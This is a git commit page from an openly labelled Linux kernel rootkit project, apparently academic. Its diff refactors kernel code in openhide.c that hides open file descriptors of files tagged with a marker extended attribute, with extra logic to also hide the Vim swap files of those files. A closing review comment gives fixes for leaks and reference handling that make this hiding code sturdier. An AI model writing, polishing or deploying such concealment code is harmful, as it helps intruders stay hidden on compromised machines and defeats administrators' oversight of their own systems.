linux-rootkit

Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)

commit 1566bd56d0414a98e647b6bd8ebf43d7c2c9ee7d
parent 8b364fdc795fecfb51c79ebfdcda9c3968832db7
Author: deurzen <m.deurzen@tum.de>
Date:   Sun,  6 Dec 2020 15:27:24 +0100

minimally refactors Vim-swap hack code

Diffstat:
Msrc/openhide.c | 52++++++++++++++++++++++++----------------------------
1 file changed, 24 insertions(+), 28 deletions(-)

diff --git a/src/openhide.c b/src/openhide.c 
@@ -115,47 +115,43 @@ fd_callback(const void *ptr, struct file *f, unsigned fd)
 ssize_t len = vfs_getxattr(f->f_path.dentry, G7_XATTR_NAME, buf, BUFLEN);
 if (len > 0 && !strncmp(G7_XATTR_VAL, buf, strlen(G7_XATTR_VAL))) {
- add_fd_to_list(&hidden_fds, (int) fd);
+ add_fd_to_list(&hidden_fds, (int)fd);
 goto leave;
 }
- const char *fname = f->f_path.dentry->d_name.name;
+ { // Rather hideous hack to account for Vim-{specific,default} swap files
+ const char *fname = f->f_path.dentry->d_name.name;
- if (strlen(fname) >= 6) {
- char *abs = kzalloc(BUFLEN, GFP_KERNEL);
+ if (strlen(fname) >= 6) {
+ char *abs = kzalloc(BUFLEN, GFP_KERNEL);
- if (strncmp(fname, ".", 1) || strncmp((fname + (strlen(fname) - 4)), ".swp", 4)) {
- goto leave;
- }
-
-
- memset(buf, 0, BUFLEN);
- strncpy(buf, (fname + 1), strlen(fname) - 5);
-
- char *path = d_path(&f->f_path, abs, 512);
+ if (strncmp(fname, ".", 1) || strncmp((fname + (strlen(fname) - 4)), ".swp", 4))
+ goto leave;
- if (IS_ERR(path))
- goto end;
+ memset(buf, 0, BUFLEN);
+ strncpy(buf, (fname + 1), strlen(fname) - 5);
- memset((path + (strlen(path) - strlen(fname))), 0, strlen(fname));
- strcat(path, buf);
+ char *pathname = d_path(&f->f_path, abs, 512);
+ if (IS_ERR(pathname))
+ goto end;
- struct path path_struct;
- if (kern_path(path, LOOKUP_FOLLOW, &path_struct))
- goto end;
+ memset((pathname + (strlen(pathname) - strlen(fname))), 0, strlen(fname));
+ strcat(pathname, buf);
- memset(buf, 0, BUFLEN);
+ struct path path;
+ if (kern_path(pathname, LOOKUP_FOLLOW, &path))
+ goto end;
- ssize_t len = vfs_getxattr(path_struct.dentry, G7_XATTR_NAME, buf, BUFLEN);
+ memset(buf, 0, BUFLEN);
+ ssize_t len = vfs_getxattr(path.dentry, G7_XATTR_NAME, buf, BUFLEN);
- if (len > 0 && !strncmp(G7_XATTR_VAL, buf, strlen(G7_XATTR_VAL))) {
- add_fd_to_list(&hidden_fds, (int) fd);
- }
+ if (len > 0 && !strncmp(G7_XATTR_VAL, buf, strlen(G7_XATTR_VAL)))
+ add_fd_to_list(&hidden_fds, (int)fd);
 end:
- kfree(abs);
- goto leave;
-
+ kfree(abs);
+ goto leave;
+ }
 }
 }
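Review bot: The early `goto leave;` that follows the `kzalloc` call on the new side skips the `kfree(abs)` at `end:`, so every name of six or more characters that fails the `.`/`.swp` suffix test leaks one BUFLEN allocation; the commit carries this over from the old code unchanged. Either move the suffix check ahead of the allocation or make that branch `goto end;`, and check the `kzalloc` result before `d_path` writes into it. A successful `kern_path` lookup is also never released: add `path_put(&path);` after the `vfs_getxattr` call, since `kern_path` takes a reference on the dentry and mount. The literal `512` passed to `d_path` should be `BUFLEN` so the bound matches the allocation. The enclosing fd_callback, the `leave:` label and the definition of `buf` lie outside the hunk.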